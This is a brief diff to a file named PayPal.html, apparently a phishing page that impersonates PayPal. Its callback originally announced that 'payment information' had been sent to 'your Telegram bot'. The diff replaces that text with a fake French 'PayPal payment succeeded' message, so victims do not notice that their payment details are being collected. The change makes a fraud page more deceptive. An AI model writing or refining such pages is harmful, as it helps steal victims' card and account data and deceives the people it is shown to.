--- a/PayPal.html
+++ b/PayPal.html
@@ -93,7 +93,7 @@
 
       xhr.onreadystatechange = function () {
         if (xhr.readyState === 4 && xhr.status === 200) {
-          alert('Informations de paiement envoyées à votre bot Telegram avec succès !');
+          alert('Le payements PayPal à été reussi avec succès !');
         }
       };
 
